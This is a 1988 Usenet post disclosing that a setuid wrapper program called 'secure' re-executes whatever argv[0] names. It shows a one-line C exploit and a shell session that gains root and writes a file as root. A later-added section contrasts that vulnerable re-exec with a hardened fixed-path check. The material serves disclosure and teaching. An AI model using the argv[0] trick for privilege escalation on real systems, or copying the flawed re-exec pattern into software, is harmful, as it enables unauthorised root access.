ruediger@ramz.UUCP (Ruediger Helsch) (12/07/88)
[I asked in a preface to this comp.sources.misc posting if it was secure. If I'd actually looked at the posting, I'd have bounced the thing myself. Guess that's the best reason yet to pay more attention to these beasties. ++bsa]

In article <8811231522.AA14884@lakart.UUCP> dg@lakart.UUCP (David Goodenough) writes:
>
>    if (strcmp(a[0], "SEC-URE"))    /* I'm damned if I know why this is */
>    {                               /* necessary, but it is */
>        (void) strcpy(program, a[0]);
>        a[0] = "SEC-URE";
>        execv(program, a);          /* re exec ourselves so setuid bits work */
>        exit(1);                    /* this should never happen */
>    }
>

$ ls -l
total 20
-rw-r--r-- 1 ruediger 4647 Dec 3 23:32 Part01
-rwsr-xr-x 1 root 10240 Dec 3 23:35 secure
-rw-r--r-- 1 ruediger 1121 Dec 3 23:33 secure.8
-rw-r--r-- 1 ruediger 1247 Dec 3 23:34 secure.c
-rw-r--r-- 1 ruediger 49 Dec 3 23:37 ttt.c
$ cat >ttt.c
main() { execl("secure","/bin/sh",(char*)0); }
$ cc ttt.c
$ a.out
$ echo "and now i am root" >/warning
$ ls -l /warning
-rw-r--r-- 1 root 18 Dec 3 23:41 /warning
$

You should better trust in ordinary setuid shell scripts. Takes some patience to break them.

-- 
Ruediger Helsch  | ruediger@ramz.uucp
Hermannstrasse 1 | ..mcvax!unido!ramz!ruediger
33 Braunschweig  |
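
Added example, not part of the original post or of the posted secure.c: the quoted re-exec takes its target from argv[0], which the caller sets freely, so the sketch below puts that choice beside a hardened one that ignores argv[0] and vets a fixed path before it would be exec'd. The function names, the temp-file stand-in for the installed binary and the ownership/mode policy are assumptions made for the illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed: the argv that ttt.c's execl("secure", "/bin/sh", ...) builds. */
char *ttt_argv[] = { "/bin/sh", NULL };
/* Constructed: temp file standing in for the installed binary (assumption). */
char sample_path[] = "/tmp/secure-demo-XXXXXX";

/* As in the quoted code: re-exec whatever the caller put in argv[0]. */
const char *reexec_path_vulnerable(char *const argv[]) { return argv[0]; }

/* Hardened: ignore argv[0]. Accept only an installer-fixed absolute path to
 * a regular file owned by `owner` and not writable by group or others. */
const char *reexec_path_hardened(char *const argv[], const char *fixed,
                                 uid_t owner)
{
    struct stat st;
    (void)argv;                          /* caller-controlled, never used */
    if (fixed == NULL || fixed[0] != '/')
        return NULL;
    if (stat(fixed, &st) != 0 || !S_ISREG(st.st_mode))
        return NULL;
    if (st.st_uid != owner || (st.st_mode & (S_IWGRP | S_IWOTH)))
        return NULL;
    return fixed;
}

/* Create the constructed sample file with the given mode; 0 on success. */
int make_sample(mode_t mode)
{
    int fd = mkstemp(sample_path);
    if (fd < 0)
        return -1;
    if (fchmod(fd, mode) != 0) { close(fd); return -1; }
    return close(fd);
}

int main(void)
{
    if (make_sample(0755) != 0)
        return 1;
    printf("vulnerable: %s\n", reexec_path_vulnerable(ttt_argv));
    printf("hardened:   %s\n",
           reexec_path_hardened(ttt_argv, sample_path, geteuid()));
    unlink(sample_path);
    return 0;
}
```

A real setuid program would open the fixed path and run the same checks with fstat on the descriptor, so the file cannot be swapped between the check and the exec. The unbounded strcpy into program in the quoted code goes away as well once argv[0] is no longer copied.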